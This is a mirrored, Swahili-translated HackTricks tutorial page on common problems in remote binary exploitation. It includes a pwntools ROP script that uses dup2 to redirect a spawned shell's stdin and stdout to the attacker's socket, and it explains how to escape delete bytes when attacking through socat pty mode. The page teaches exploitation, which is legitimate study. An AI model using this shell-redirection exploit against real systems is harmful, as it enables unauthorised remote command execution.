Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/binary-exploitation/common-exploiting-problems.md

56 lines
4.1 KiB
Markdown
Raw Blame History

# Matatizo ya Kawaida ya Kudukua
<details>
<summary><strong>Jifunze kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionekana kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **fuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## FDs katika Kudukua Kijijini
Unapotuma dudu kwa seva ya mbali ambayo inaita **`system('/bin/sh')`** kwa mfano, hii itatekelezwa katika mchakato wa seva kwa hakika, na `/bin/sh` itatarajia kuingia kutoka stdin (FD: `0`) na itachapisha matokeo kwenye stdout na stderr (FDs `1` na `2`). Kwa hivyo, mkaidi hataweza kuingiliana na kifaa cha amri.
Njia ya kusuluhisha hii ni kudai kwamba wakati seva ilipoanza iliumba **FD nambari `3`** (kwa kusikiliza) na kwamba basi, uunganisho wako utakuwa katika **FD nambari `4`**. Kwa hivyo, ni rahisi kutumia syscall **`dup2`** kuzidisha stdin (FD 0) na stdout (FD 1) katika FD 4 (ile ya uunganisho wa mkaidi) hivyo itawezekana kuwasiliana na kifaa cha amri mara tu itakapotekelezwa.
[**Mfano wa kudukua kutoka hapa**](https://ir0nstone.gitbook.io/notes/types/stack/exploiting-over-sockets/exploit):
```python
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
```
## Socat & pty
Tafadhali kumbuka kuwa socat tayari inahamisha **`stdin`** na **`stdout`** kwa soketi. Walakini, mode ya `pty` **inajumuisha wahariri wa KUFUTA**. Kwa hivyo, ikiwa unatuma `\x7f` (`KUFUTA` -) ita **kufuta herufi iliyotangulia** ya shambulio lako.
Ili kuepuka hili, **herufi ya kutoroka `\x16` lazima iwekwe mbele ya yoyote `\x7f` iliyotumwa.**
**Hapa unaweza** [**kupata mfano wa tabia hii**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.**
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikionyeshwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**swagi rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
Reference in a new issue View git blame Copy permalink